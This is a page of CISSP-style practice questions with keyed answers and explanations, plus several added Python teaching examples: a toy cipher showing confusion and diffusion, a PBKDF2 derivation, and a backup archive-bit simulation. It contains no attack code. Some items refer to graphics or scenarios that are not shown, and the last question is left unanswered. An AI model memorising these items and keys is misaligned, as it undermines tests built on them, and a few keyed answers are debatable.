A symmetric algorithm must have certain characteristics to be considered strong. Which of the following is correct pertaining to these types of characteristics? A. Confusion is carried out through transposition, and diffusion is carried out through diffusion. B. Confusion is carried out through substitution, and diffusion is carried out through transposition. C. Confusion and diffusion are both used to increase the work factor. D. The randomness of the cryptoperiod and functions in the algorithm correlate with the level of confusion and diffusion that is provided.

B. Confusion is carried out through substitution, and diffusion is carried out through transposition.
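
To make confusion and diffusion concrete, here is an added example (not from the original page) of a toy 16-bit substitution-permutation network. The 4-bit S-box (the one from the PRESENT cipher) is the substitution step, the bit permutation is the transposition step, and the round keys are fixed constructed values. avalanche() flips one plaintext bit and counts how many ciphertext bits change, so you can see that substitution alone keeps a change inside one nibble, transposition alone never changes more than the one flipped bit, and only the two together spread it across the block. The cipher is a teaching toy, not something to protect data with.

```python
import random

# 4-bit S-box from PRESENT: the substitution (confusion) step.
SBOX = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD, 0x3, 0xE, 0xF, 0x8, 0x4, 0x7, 0x1, 0x2]

# Constructed round keys for a 6-round, 16-bit toy cipher (6 rounds + final whitening key).
ROUND_KEYS = [0x3A94, 0x7C21, 0x1F0E, 0x55AA, 0x0C3D, 0xE781, 0x9D64]

def sub_nibbles(x):
    """Confusion: run every 4-bit nibble through the S-box."""
    out = 0
    for i in range(4):
        out |= SBOX[(x >> (4 * i)) & 0xF] << (4 * i)
    return out

def permute_bits(x):
    """Diffusion (transposition): bit i moves to 4*i mod 15 (bit 15 stays), so the
    four output bits of one S-box land in four different S-boxes next round."""
    out = 0
    for i in range(16):
        if (x >> i) & 1:
            j = 15 if i == 15 else (4 * i) % 15
            out |= 1 << j
    return out

def encrypt(block, use_sbox=True, use_perm=True):
    """Key-xor, substitute, permute per round; the flags let us switch a step off."""
    state = block
    for key in ROUND_KEYS[:-1]:
        state ^= key
        if use_sbox:
            state = sub_nibbles(state)
        if use_perm:
            state = permute_bits(state)
    return state ^ ROUND_KEYS[-1]

def avalanche(use_sbox, use_perm, trials=500, seed=7):
    """Flip one random plaintext bit and count ciphertext bits that change.
    Returns (average, maximum) over the trials; seeded so the run is repeatable."""
    rng = random.Random(seed)
    diffs = []
    for _ in range(trials):
        pt = rng.getrandbits(16)
        bit = 1 << rng.randrange(16)
        c1 = encrypt(pt, use_sbox, use_perm)
        c2 = encrypt(pt ^ bit, use_sbox, use_perm)
        diffs.append(bin(c1 ^ c2).count("1"))
    return sum(diffs) / len(diffs), max(diffs)

if __name__ == "__main__":
    for label, s, p in (("substitution only", True, False),
                        ("transposition only", False, True),
                        ("both", True, True)):
        avg, mx = avalanche(s, p)
        print(f"{label:18s} avg changed bits {avg:4.1f}  max {mx}")
```

A good block cipher flips about half the output bits for a one-bit input change. Substitution only can never push a difference outside the nibble it started in (at most 4 bits), and key-xor plus transposition is linear, so a one-bit difference stays a one-bit difference; the combination is what produces the avalanche.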

Which of the following best describes what a transaction-processing system provides? A. Redundancy. B. Consistency. C. Confidentiality. D. Availability.

B. Consistency.

Which of the following is not an advantage of using content distribution networks? A. Improved responsiveness to regional users B. Resistance to ARP spoofing attacks C. Customization of content for regional users D. Resistance to DDoS attacks

B. Content distribution networks (CDNs) work by replicating content across geographically dispersed nodes. This means that regional users (those closest to a given node) will see improved responsiveness and could have tailored content delivered to them. It also means that it is much more difficult to mount a successful DDoS attack. An ARP spoofing attack, however, takes place on the local area network and is therefore unrelated to the advantages of CDNs.

There are different categories for evidence depending upon what form it is in and possibly how it was collected. Which of the following is considered supporting evidence? A. Best evidence B. Corroborative evidence C. Conclusive evidence D. Direct evidence

B. Corroborative evidence cannot stand alone, but instead is used as supporting information in a trial. It is often testimony indirectly related to the case but offers enough correlation to supplement the lawyer's argument. The other choices are all types of evidence that can stand alone.

Which is the most valuable technique when determining if a specific security control should be implemented? A. Risk analysis B. Cost/benefit analysis C. ALE results D. Identifying the vulnerabilities and threats causing the risk

B. Cost/benefit analysis

Referring to the TCP/IP model, which of the following are application layer protocols? A. IEEE 802.3 Ethernet and PPP B. DNS, DHCP, and SNMP C. TCP and UDP D. IPv4 and IPv6

B. DNS, DHCP, and SNMP

An attacker can modify the client-side JavaScript that provides structured layout and HTML representation. This commonly takes place through form fields within compromised web servers. Which of the following best describes this type of attack? A. Injection attack B. DOM-based XSS C. Persistent XSS D. Session hijacking

B. DOM (Document Object Model)-based XSS vulnerabilities are also referred to as local cross-site scripting. DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim's browser to execute the resulting abusive JavaScript code.

What does DES stand for? A. Data Encryption System B. Data Encryption Standard C. Data Encoding Standard D. Data Encryption Signature

B. Data Encryption Standard. DES is based on IBM's Lucifer cipher and was adopted in 1977 by the National Bureau of Standards (now NIST), with NSA review, as the U.S. federal standard (FIPS 46) for encrypting sensitive but unclassified government data.

Mark is a general manager of a large national sporting goods chain. He manages a Denver store with 50 employees. To keep track of different products that have unique characteristics and coding, Mark sets up multiple inventory databases within his own store. At the end of every quarter, he combines the different databases and analyzes trends for his regular report to the national HQ. What type of database system is Mark using to create his report? A. Data Warehouse. B. Data Mart C. Data Storage. D. Data Mine.

B. Data Mart

Overwriting and/or degaussing are used to clear and purge all of the following except: A. Random access memory B. Data buses C. Secondary storage. D. Magnetic hard disks.

B. Data buses

Which of the following is a true statement pertaining to data encryption when it is used to protect data? A. It verifies the integrity and accuracy of the data. B. It requires careful key management. C. It does not require much system overhead in resources. D. It requires keys to be escrowed.

B. Data encryption always requires careful key management. Most algorithms are so strong today that it is much easier to go after key management than to launch a brute-force attack. Hashing algorithms are used for data integrity, encryption does require a good amount of resources, and keys do not have to be escrowed for encryption.

A network engineer just informed Bob that the parity data for their RAID system has been corrupted. Which of the following best describes the outcome of this type of situation? A. The hot swappable drive has failed. B. Data from other drives cannot be used to rebuild lost or corrupted data. C. Three of the five drives cannot be reestablished. D. The mean time to repair just decreased.

B. Data from other drives cannot be used to rebuild lost or corrupted data.

A fraud analyst with a national insurance company uses database tools every day to help identify violations and identify relationships between the captured data through the uses of rule discovery. These tools help identify relationships among a wide variety of information types. What kind of knowledge discovery in database (KDD) is this considered? A. Probability B. Statistical C. Classification D. Behavioral

B. Data mining is also known as knowledge discovery in database (KDD), which is a combination of techniques used to identify valid and useful patterns. Different types of data can have various interrelationships, and the method used depends on the type of data and patterns that are sought. The following are three approaches used in KDD systems to uncover these patterns: classification, which groups together data according to shared similarities; probabilistic, which identifies data interdependencies and applies probabilities to their relationships; and statistical, which identifies relationships between data elements and uses rule discovery.

Which of the following describes object-oriented programming deferred commitment? A. Autonomous objects, which cooperate through exchanges of messages B. The internal components of an object can be refined without changing other parts of the system C. Object-oriented analysis, design, and modeling maps to business needs and solutions D. Other programs using same objects

B. Deferred commitment means that the internal components of an object can be refined without changing other parts of the system. Non-object-oriented programming applications are written as monolithic entities. This means an application is just one big pile of code. If you need to change something in this pile, you would need to go through the whole program's logic functions to figure out what your one change is going to break. If you choose to write your program in an object-oriented language, you don't have one monolithic application, but an application that is made up of smaller components (objects). If you need to make changes or updates to some functionality in your application, you can just change the code within the class that creates the object carrying out that functionality and not worry about everything else the program actually carries out.

Which of the following defines a proper sequence of steps of a data classification program? A. Determine the controls available for various levels of classified data, identify which data can be best protected by them, and assign a data owner to each level. B. Define the classification level, specify the classification criteria, and identify the data owners who will be responsible for determining classification of the data. C. Identify the data owners, and have them define the classification scheme and determine the necessary controls. D. Document the classification criteria, document the control criteria, and document the expected exceptions.

B. Define the classification level, specify the classification criteria, and identify the data owners who will be responsible for determining classification of the data.

Which of the following defines a proper sequence of steps of data classification program? A. Determine the controls available for various levels of classified data, identify which data can be best protected by them, and assign a data owner to each level. B. Define the classification levels, specify the classification criteria, and identify the data owners who will be responsible for determining classification data. C. Identify the data owners, and have them define the classification scheme and determine the necessary controls. D. Document the classification criteria, document the control criteria, and document the expected exceptions.

B. Define the classification levels, specify the classification criteria, and identify the data owners who will be responsible for determining classification data.

What is the ultimate purpose of the Trusted Computing Base (TCB)? A. defines the level of security a system provides. B. Defines the level of security assurance a system provides. C. Defines levels of security classifications a system provides. D. Defines security access classifications a system provides.

B. Defines the level of security assurance a system provides.

What is the chief security responsibility of a data owner? A. Determining how the data should be preserved. B. Determining the data classification C. Determining the data value D. Determining how the data will be used.

B. Determining the data classification.

The generation of keys that are made up of random values is referred to as Key Derivation Functions (KDFs). What values are not commonly used in this key generation process? A. Hashing values B. Asymmetric values C. Salts D. Passwords

B. Different values can be used independently or together to play the role of random key material. The algorithm is created to use specific hash, password, and/or salt values, which go through a certain number of rounds of mathematical functions dictated by the algorithm.
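
An added worked example (not from the original page) of one such KDF, PBKDF2 with HMAC-SHA256, written out so that the password, the salt and the round count are visible as the inputs the answer lists, and then cross-checked against hashlib's built-in implementation. The salt values are constructed for the demo; in practice generate them with os.urandom.

```python
import hashlib
import hmac

def pbkdf2_hmac_sha256(password: bytes, salt: bytes, iterations: int, dklen: int) -> bytes:
    """PBKDF2 (RFC 8018) spelled out. For each output block: U1 = HMAC(password,
    salt || INT(block)), U_i = HMAC(password, U_{i-1}), and T = U1 ^ U2 ^ ... ^ U_c.
    The round count is what makes guessing expensive for an attacker."""
    out = b""
    block_index = 1
    while len(out) < dklen:
        u = hmac.new(password, salt + block_index.to_bytes(4, "big"), hashlib.sha256).digest()
        t = u
        for _ in range(iterations - 1):
            u = hmac.new(password, u, hashlib.sha256).digest()
            t = bytes(a ^ b for a, b in zip(t, u))
        out += t
        block_index += 1
    return out[:dklen]

def matches_stdlib(password: bytes, salt: bytes, iterations: int, dklen: int) -> bool:
    """Cross-check the hand-written KDF against hashlib.pbkdf2_hmac."""
    return pbkdf2_hmac_sha256(password, salt, iterations, dklen) == \
        hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen)

def derive_key(password: str, salt: bytes, iterations: int = 600_000, dklen: int = 32) -> str:
    """Hex-encoded key for a human password; the salt makes the same password
    yield different keys, so precomputed tables do not transfer between users."""
    return pbkdf2_hmac_sha256(password.encode("utf-8"), salt, iterations, dklen).hex()

if __name__ == "__main__":
    salt_a = bytes.fromhex("0011223344556677")  # constructed; use os.urandom(16) in practice
    salt_b = bytes.fromhex("8899aabbccddeeff")
    print(derive_key("correct horse battery staple", salt_a, 10_000))
    print(derive_key("correct horse battery staple", salt_b, 10_000))  # same password, different key
```

Note that nothing asymmetric appears anywhere in the construction, which is the point of the question: the random-looking key material comes from hashing, the password and the salt run through many rounds.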

Which of the following provides the correct characteristic for the specific data backup type? A. Differential process backs up the files that have been modified since the last backup B. Differential process backs up the files that have been modified since the last full backup C. Incremental process sets the archive bit to 1 D. Differential process sets the archive bit to 1

B. Differential process backs up the files that have been modified since the last full backup
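
An added simulation (not part of the original material) of the archive bit under full, incremental and differential backups, run over a constructed four-file file set with one file changed per day. It shows why a differential set grows each day while an incremental set does not, why neither process sets the bit to 1 (only a modification does), and what each strategy needs at restore time.

```python
# Archive bit: 1 means "changed since the last backup that cleared the bit".
# Files are modelled as a dict name -> archive bit; the names are constructed.

def modify(files, names):
    """A write to a file is what sets its archive bit."""
    for n in names:
        files[n] = 1

def full_backup(files):
    """Captures everything and clears every archive bit."""
    captured = set(files)
    for n in files:
        files[n] = 0
    return captured

def incremental_backup(files):
    """Captures files changed since the last backup of any kind, then clears
    their bits so the next run sees only newer changes."""
    captured = {n for n, bit in files.items() if bit == 1}
    for n in captured:
        files[n] = 0
    return captured

def differential_backup(files):
    """Captures files changed since the last full backup and leaves the bits
    set, so the same files are captured again tomorrow."""
    return {n for n, bit in files.items() if bit == 1}

def simulate(strategy):
    """Full backup on Sunday, then three daily backups with a different file
    modified each day. Returns the set captured by each daily backup."""
    files = {"a": 1, "b": 1, "c": 1, "d": 1}
    full_backup(files)
    daily = []
    for changed in (["a"], ["b"], ["c"]):
        modify(files, changed)
        daily.append(strategy(files))
    return daily

def restore_plan(daily):
    """Which sets must be applied after the full backup to rebuild the last day:
    walk backwards until the daily sets cover every file changed since the full."""
    changed = set().union(*daily)
    needed, covered = [], set()
    for i in range(len(daily) - 1, -1, -1):
        if covered >= changed:
            break
        needed.append(f"day{i + 1}")
        covered |= daily[i]
    return ["full"] + list(reversed(needed))

if __name__ == "__main__":
    for strategy in (incremental_backup, differential_backup):
        daily = simulate(strategy)
        print(strategy.__name__, daily, "restore:", restore_plan(daily))
```

The trade-off the question is really about falls out of the two restore plans: incremental backups are small but every one of them since the last full is needed (and a single corrupt set breaks the chain), while differential sets grow day by day but only the latest one is needed next to the full.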

Which of the following terms describes a system where the user can grant access to resources they own to anyone at any time, and system administrators have the ability to change ownership and permissions on resources as necessary? A. Mandatory access control (MAC) B. Discretionary Access Control (DAC) C. Role-based Access Control (RBAC) D. Rule-based Access Control (or ACLs)

B. Discretionary Access Control (DAC)

Patty is giving a presentation next week to the executive staff of her company. She wants to illustrate the benefits of the company using specific cloud computing solutions. Which of the following does not properly describe one of these benefits or advantages? A. Organizations have more flexibility and agility in IT growth and functionality. B. Cost of computing can be increased since it is a shared delivery model. C. Location independence can be achieved because the computing is not centralized and tied to a physical data center. D. Scalability and elasticity of resources can be accomplished in near real-time through automation.

B. Each of the listed items are correct benefits or characteristics of cloud computing except "Cost of computing can be increased since it is a shared delivery model." The correct answer would be "Cost of computing can be decreased since it is a shared delivery model."

A risk analysis can be carried out through qualitative or quantitative means. It is important to choose the right approach to meet the organization's goals. In a quantitative analysis, which of the following items would not be assigned a numeric value? i. Asset value ii. Threat frequency iii. Severity of vulnerability iv. Impact damage v. Safeguard costs vi. Safeguard effectiveness vii. Probability A. All of them B. None of them C. ii D. vii

B. Each of these items would be assigned a numeric value in a quantitative risk analysis. Each element is quantified and entered into equations to determine total and residual risks. It is more of a scientific or mathematical approach to risk analysis compared to qualitative.

Jack is the CEO of a ticket brokerage house and has called a meeting with his executive team to discuss the rising security concerns that he's been made aware of. After probing his team for answers, Jack learns that which of the following entities are his biggest threat? A. External hackers. B. Employees. C. Network partners. D. Equipment malfunctions.

B. Employees.

Though "something you know," in the form of passwords, is the most common authentication factor still used today, it is considered one of the weakest. This is because passwords are easy for users to share, and relatively easy for adversaries to steal or guess. Which of the following measures is the best way to counter attacks on this form of authentication? A. Store all passwords in encrypted form only, so that recovering them requires a special key to decrypt them for authentication. B. Employ a password policy to ensure that passwords are chosen in such a way that they are neither easy for an attacker to guess nor easy for an attacker to brute force. C. Require that all passwords be composed of a combination of unique characters, regardless of length. D. Ensure that accounts are locked out after a minimum number of incorrect guesses within a short amount of time.

B. Employing a comprehensive password policy is the best method for ensuring that the passwords selected by users are as strong as possible against all forms of attack. This includes making them less easy to guess, by prohibiting the use of strings that are associated with knowable attributes of the user, such as names, birth dates, etc. Passwords should include some amount of complexity beyond simple dictionary words as well, which typically requires the use of some special characters to make them less likely to be brute forcible. Most importantly, they should be required to be as long as is practical given the system implementing them. Password aging and periodic strength audits are also best practices.

Operating systems can be programmed to carry out different methods for process isolation. Which of the following refers to a method in which an interface defines how communication can take place between two processes and no process can interact with the other's internal programming code? A. Virtual Mapping. B. Encapsulation of objects. C. Time Multiplexing. D. Naming Distinctions.

B. Encapsulation of objects.

End-to-end encryption is used by users, and link encryption is used by service providers. Which of the following correctly describes these technologies? A. Link encryption does not encrypt headers and trailers. B. Link encryption encrypts everything but data link messaging. C. End-to-end encryption requires headers to be decrypted at each hop. D. End-to-end encryption encrypts all headers and trailers.

B. Encryption can be performed at different communication levels, each with different types of protection and implications. Two general modes of encryption implementation are link encryption and end-to-end encryption. Link encryption encrypts all the data along a specific communication path, as in a satellite link, T3 line, or telephone circuit. Not only is the user information encrypted, but the header, trailers, addresses, and routing data that are part of the packets are also encrypted. The only traffic not encrypted in this technology is the data link control messaging information, which includes instructions and parameters that the different link devices use to synchronize communication methods. Link encryption provides protection against packet sniffers and eavesdroppers. In end-to-end encryption, the headers, addresses, routing, and trailer information are not encrypted, enabling attackers to learn more about a captured packet and where it is headed. With end-to-end encryption only the data payload is encrypted.

Which is not true of counter mode (CTR), which is available to be used in block algorithms? A. Able to preprocess key stream. B. Encryption cannot execute in parallel, unlike OFB. C. Counters increment for each data block. D. Used as part of the IEEE 802.11i standard.

B. Encryption cannot execute in parallel, unlike OFB.

______________, a declarative access control policy language implemented in XML and a processing model, describes how to interpret security policies. _____________ is an XML-based framework being developed by OASIS for exchanging user, resource, and service provisioning information between cooperating organizations. A. Service Provisioning Markup Language (SPML), Extensible Access Control Markup Language (XACML) B. Extensible Access Control Markup Language (XACML), Service Provisioning Markup Language (SPML) C. Extensible Access Control Markup Language (XACML), Security Assertion Markup Language (SAML) D. Security Assertion Markup Language (SAML), Service Provisioning Markup Language (SPML)

B. Extensible Access Control Markup Language (XACML), a declarative access control policy language implemented in XML and a processing model, describes how to interpret security policies. Service Provisioning Markup Language (SPML) is an XML-based framework being developed by OASIS for exchanging user, resource, and service provisioning information between cooperating organizations.

Today, satellites are used to provide wireless connectivity between different locations. What two prerequisites are needed for two different locations to communicate via satellite links? A. They must be connected via a phone line and have access to a modem. B. They must be within the satellite's line of sight and footprint. C. They must have broadband and a satellite in low Earth orbit. D. They must have a transponder and be within the satellite's footprint.

B. For two different locations to communicate via satellite links, they must be within the satellite's line of sight and footprint (area covered by the satellite). The sender of information modulates the data onto a radio signal that is transmitted to the satellite. A transponder on the satellite receives this signal, amplifies it, and relays it to the receiver. The receiver must have a certain type of antenna, which is one of those circular, dish-like components on top of buildings. The antenna contains one or more microwave receivers, depending upon how many satellites it is accepting data from. The size of the footprint depends upon the type of satellite being used. It can be as large as a country or only a few hundred feet in circumference.

There is a specific terminology taxonomy used in the discipline of formal architecture framework development and implementation. Which of the following terms has an incorrect definition? i. Architecture: Fundamental organization of a system embodied in its components, their relationships to each other and to the environment, and the principles guiding its design and evolution. ii. Architectural description (AD): Representation of a whole system from the perspective of a related set of concerns. iii. Stakeholder: Individual, team, or organization (or classes thereof) with interests in, or concerns relative to, a system. iv. View: Collection of document types to convey an architecture in a formal manner. v. Viewpoint: A specification of the conventions for constructing and using a view. A template from which to develop individual views by establishing the purposes and audience for a view and the techniques for its creation and analysis. A. i, iii B. ii, iv C. iv, v D. ii

B. Formal enterprise architecture frameworks use the following terms: Architecture: Fundamental organization of a system embodied in its components, their relationships to each other and to the environment, and the principles guiding its design and evolution. Architectural description (AD): Collection of document types to convey an architecture in a formal manner. Stakeholder: Individual, team, or organization (or classes thereof) with interests in, or concerns relative to, a system. View: Representation of a whole system from the perspective of a related set of concerns. Viewpoint: A specification of the conventions for constructing and using a view. A template from which to develop individual views by establishing the purposes and audience for a view and the techniques for its creation and analysis.

Tim is a software developer for a financial institution. He develops middleware software code that carries out his company's business logic functions. One of the applications he works with is written in the C programming language and seems to be taking up too much memory as it runs over time. Which of the following best describes what Tim should implement to rid this software of this type of problem? A. Bounds checking B. Garbage collector C. Parameter checking D. Compiling

B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

Which of the following statements is the most important to understand about physical locks? A. Combination locks can be accessed by the sharing of a secret that can be known by an unknown number of individuals, whereas keyed locks can be accessed by the sharing of a device that can be physically replicated among an unknown number of individuals. B. Given enough unattended time, a sufficiently skilled or determined attacker can bypass any physical lock. C. The grade and strength of the physical characteristics of a lock determine the amount of time that it can be expected to withstand a concentrated attack. D. The grade and strength of the physical characteristics of the components surrounding the lock (hasp, strike, door jamb, etc.) are as important as the lock itself.

B. Given enough unattended time, a sufficiently skilled or determined attacker can bypass any physical lock.

Which of the following refers to the assessment of a system by someone with only partial knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. Black box testing. D. Blue box testing.

B. Gray box testing.

Which of the following is a true statement pertaining to markup languages? A. Hypertext Markup Language (HTML) came from Generalized Markup Language (GML), which came from the Standard Generalized Markup Language (SGML). B. Hypertext Markup Language (HTML) came from Standard Generalized Markup Language (SGML), which came from the Generalized Markup Language (GML). C. Standard Generalized Markup Language (SGML) came from the Hypertext Markup Language (HTML), which came from the Generalized Markup Language (GML). D. Standard Generalized Markup Language (SGML) came from the Generalized Markup Language (GML), which came from the Hypertext Markup Language (HTML).

B. HTML came from Standard Generalized Markup Language (SGML), which came from the Generalized Markup Language (GML). A markup language is a way to structure text and how it will be presented. You can control how the text looks and some of the actual functionality the page provides.

Betty has received several e-mail messages from unknown sources that try to entice her to click a specific link using a "Click Here" approach. Which of the following best describes what is most likely taking place in this situation? A. DNS pharming attack B. Embedded hyperlink is obfuscated C. Malware back-door installation D. Bidirectional injection attack

B. HTML documents and e-mails allow users to attach or embed hyperlinks in any given text, such as the "Click Here" links you commonly see in e-mail messages or web pages. Attackers misuse hyperlinks to deceive unsuspecting users into clicking rogue links. The most common approach is known as URL hiding.

When reviewing a reciprocal disaster recovery agreement between two companies, which of the following should be the main concern? A. The soundness of the business impact analysis. B. Hardware and software compatibility. C. Frequency of system testing. D. Differences in business missions.

B. Hardware and software compatibility.

Which problems may be caused by humidity in an area with electrical devices? A. High humidity causes excess electricity, and low humidity causes corrosion. B. High humidity causes corrosion, and low humidity causes static electricity. C. High humidity causes power fluctuations, and low humidity causes static electricity. D. High humidity causes corrosion, and low humidity causes power fluctuations.

B. High humidity can cause corrosion, and low humidity can cause excessive static electricity. Static electricity can short out devices or cause loss of information.

Barry was told that the IDS product that is being used on the network has heuristic capabilities. Which of the following best describes this functionality? A. Gathers packets and reassembles the fragments before assigning anomaly values B. Gathers data to calculate the probability of an attack taking place C. Gathers packets and compares their payload values to a signature engine D. Gathers packet headers to determine if something suspicious is taking place within the network traffic

B. IDS and some antimalware products are said to have "heuristic" capabilities. The term heuristic means to create new information from different data sources. The IDS gathers different "clues" from the network or system and calculates the probability an attack is taking place. If the probability hits a set threshold, then the alarm sounds.

Which of the following does NOT describe IP telephony security? A. VoIP networks should be protected with the same security controls used on a data network. B. Softphones are more secure than IP phones. C. As endpoints, IP phones can become the target of attacks. D. The current Internet architecture over which voice is transmitted is less secure than physical phone lines.

B. IP softphones should be used with caution. A softphone is a software application that allows the user to make phone calls via a computer over the Internet. A softphone, which replaces dedicated hardware, behaves like a traditional telephone. It can be used with a headset connected to a PC's sound card or with a USB phone. Skype is an example of a softphone application. Compared to hardware-based IP phones, softphones make an IP network more vulnerable. However, softphones are no worse than any other interactive Internet application. In addition, data-centered malware can more easily enter a network via softphones because they do not separate voice traffic from data as do IP phones.

Internet Protocol Security (IPSec) is actually a suite of protocols. Each protocol within the suite provides different functionality. Which of the following is not a function or characteristic of IPSec? A. Encryption B. Link layer protection C. Authentication D. Protection of packet payloads and the headers

B. IPSec is a protocol used to provide VPNs that use strong encryption and authentication functionality. It can work in two different modes: tunnel mode (payload and headers are protected) or transport mode (payload protection only). IPSec works at the network layer, not the data link layer.

IPv6 has many new and different characteristics and functionality compared to IPv4. Which of the following is an incorrect functionality or characteristic of IPv6? i. IPv6 allows for nonscoped addresses, which enables an administrator to restrict specific addresses for specific servers or file and print sharing, for example. ii. IPv6 has IPSec integrated into the protocol stack, which provides application-based secure transmission and authentication. iii. IPv6 has more flexibility and routing capabilities compared to IPv4 and allows for Quality of Service (QoS) priority values to be assigned to time-sensitive transmissions. iv. The protocol offers autoconfiguration, which makes administration much easier compared to IPv4, and it does not require network address translation (NAT) to extend its address space. A. i, iii B. i, ii C. ii, iii D. ii, iv

B. IPv6 allows for scoped addresses, which enables an administrator to restrict specific addresses for specific servers or file and print sharing, for example. IPv6 has IPSec integrated into the protocol stack, which provides end-to-end secure transmission and authentication.

All of the following should be considered as part of the supply chain risk management process for a smartphone manufacturer except A. Hardware Trojans inserted by downstream partners B. ISO/IEC 27001 C. Hardware Trojans inserted by upstream partners D. NIST Special Publication 800-161

B. ISO/IEC 27001 is a standard covering information security management systems, which is a much broader topic than supply chain risk management. The other three options are better answers because they are directly tied to this process: NIST's Special Publication 800-161 directly addresses supply chain risk, and the insertion of hardware Trojans could happen at any point in the chain.

Which of the following is true of a qualitative risk analysis approach? A. Results are definitive and objective in nature. B. Identifies major areas of risk. C. Expected loss is given in the form of dollars and cents. D. Results are often complex.

B. Identifies major areas of risk.

Which of the following best describes some of the issues that the evaluation testers most likely ran into while testing the submitted product? A. Nonprotected ROM sections B. Vulnerabilities that allowed malicious code to execute in protected memory sections C. Lack of a predefined and implemented trusted computing base D. Lack of a predefined and implemented security kernel

B. If testers suggested to the team that address space layout randomization and data execution protection should be integrated, this is most likely because the system allows for malicious code to easily execute in memory sections that would be dangerous to the system. These are both memory protection approaches.

When a CPU is passed an instruction set and data to be processed and the program status word (PSW) register contains a value indicating that execution should take place in privileged mode, which of the following would be considered true? A. Operating system is executing in supervisory mode. B. Request came from a trusted process. C. Functionality that is available in user mode is not available. D. An untrusted process submitted the execution request.

B. If the PSW has a bit value that indicates the instructions to be executed should be carried out in privileged mode, this means a trusted process (e.g., an operating system process) made the request and can have access to the functionality that is not available in user mode.

All of the following are normally legitimate reasons to suspend rather than delete user accounts except A. Regulatory compliance B. Protection of the user's privacy C. Investigation of a subsequently discovered event D. Data retention policy

B. If the organization was intentionally attempting to protect the privacy of its users, suspension of the account would be a poor privacy measure compared to outright deletion.

When protecting information assets, which of the following security controls is most effective for data in motion? A. Requiring whole-disk encryption for all devices with the Advanced Encryption Standard (AES). B. Implementing encryption with Transport Layer Security or IPsec. C. Implementing whole-memory encryption with the storage keys in CPU registers. D. Requiring the use of next-generation firewalls (NGFWs) and/or network-based intrusion prevention systems (NIPS)

B. Implementing encryption with Transport Layer Security or IPsec.

Crime Prevention Through Environmental Design (CPTED) provides a different approach than a target hardening approach. Which of the following is an example of target hardening? A. Hedges and planters around a facility should not be higher than 2.5 feet tall, so they cannot be used to gain access to a window. B. Implementing locks and alarms to delay and detect intrusions. C. Street furnishings (benches and tables) encourage people to sit and watch what is going on around them, which discourages criminal activity. D. CCTV cameras are mounted in full view, so criminals know their activities will be captured.

B. Implementing locks and alarms to delay and detect intrusions.

Use the following scenario to answer Questions 61-62. Jim works for a large energy company. His senior management just conducted a meeting with Jim's team with the purpose of reducing IT costs without degrading their security posture. The senior management decided to move all administrative systems to a cloud provider. These systems are proprietary applications currently running on Linux servers. Which of the following services would allow Jim to transition all administrative custom applications to the cloud while leveraging the service provider for security and patching of the cloud platforms? A. IaaS B. PaaS C. SaaS D. IDaaS

B. In a Platform as a Service (PaaS) contract, the service provider normally takes care of all configuration, patches, and updates for the virtual platform. Jim would only have to worry about porting the applications and running them.

In practical use, which of the following best describes a "session"? A. Any data exchange between two discrete endpoints, over any arbitrary duration B. Any authenticated exchange between two parties that is used to carry on a conversation, with a discrete beginning, period of activity, and termination C. Any discrete period of time that a user is logged into a workstation D. The volume of data exchanged between two systems during a discrete period of time

B. In most practical uses of the word, a "session" implies some initial form of authentication between two parties, be it between a user and a workstation or between two systems on a network. Subsequent to the authentication phase at the session's initiation, the two parties carry on an exchange of data interactively, and then terminate the exchange when the session is no longer required, most commonly through mutual agreement. A session therefore has a discrete beginning, period of interactive activity, and a discrete termination.

What object-oriented programming term or concept is illustrated in the graphic that follows? A. Methods B. Messages C. Abstraction D. Data hiding

B. In object-oriented programming objects need to be able to communicate with each other, and this happens by using messages that are sent to the receiving object's application program interface (API). For example, if object A needs to tell object B that a user's checking account must be reduced by $40, it sends object B a message. The message is made up of the destination, the method that needs to be performed, and the corresponding arguments. This graphic illustrates object communication through the use of their messaging functionality.

Use the following scenario to answer Questions 24-26. Grace is a security administrator for a medical institution and is responsible for many different teams. One team has reported that when their main FDDI connection failed, three critical systems went offline even though the connection was supposed to provide redundancy. Grace has to also advise her team on the type of fiber that should be implemented for campus building-to-building connectivity. Since this is a medical training facility, many surgeries are video recorded and that data must continuously travel from one building to the next. One other thing that has been reported to Grace is that periodic DoS attacks take place against specific servers within the internal network. The attacker sends excessive ICMP Echo Request packets to all the hosts on a specific subnet, which is aimed at one specific server. Which of the following is the best type of fiber that should be implemented in this scenario? A. Single mode B. Multimode C. Optical carrier D. SONET

B. In single mode, a small glass core is used for high-speed data transmission over long distances. This scenario specifies campus building-to-building connections, which are usually short distances. In multimode, a large glass core is used and is able to carry more data than single-mode fibers, though they are best for shorter distances because of their higher attenuation levels.

Lynn logs into a website and purchases an airline ticket for her upcoming trip. The website also offers her pricing and package deals for hotel rooms and rental cars while she is completing her purchase. The airline, hotel, and rental companies are all separate and individual companies. Lynn decides to purchase her hotel room through the same website at the same time. The website is using Security Assertion Markup Language to allow for this type of federated identity management functionality. In this example which entity is the principal, which entity is the identity provider, and which entity is the service provider? A. Portal, Lynn, hotel company B. Lynn, airline company, the hotel company C. Lynn, hotel company, airline company D. Portal, Lynn, airline company

B. In this scenario, Lynn is considered the principal, the airline company is considered the identity provider, and the hotel company that receives the user's authentication information from the airline company web server is considered the service provider. Security Assertion Markup Language (SAML) provides the authentication pieces to federated identity management systems to allow business-to-business (B2B) and business-to-consumer (B2C) transactions.

Electrical power is being provided more through smart grids, which allow for self-healing, resistance to physical and cyberattacks, increased efficiency, and better integration of renewable energy sources. Countries want their grids to be more reliable, resilient, flexible, and efficient. Why does this type of evolution in power infrastructure concern many security professionals? A. Allows for direct attacks through Power over Ethernet. B. Increases embedded software and computing capabilities. C. Does not have proper protection against common web-based attacks. D. Power fluctuation and outages directly affect computing systems.

B. Increases embedded software and computing capabilities.

Mirroring of drives is when data is written to two drives at once for redundancy purposes. What similar type of technology is shown in the graphic that follows? A. Direct access storage B. Disk duplexing C. Striping D. Massive array of inactive disks

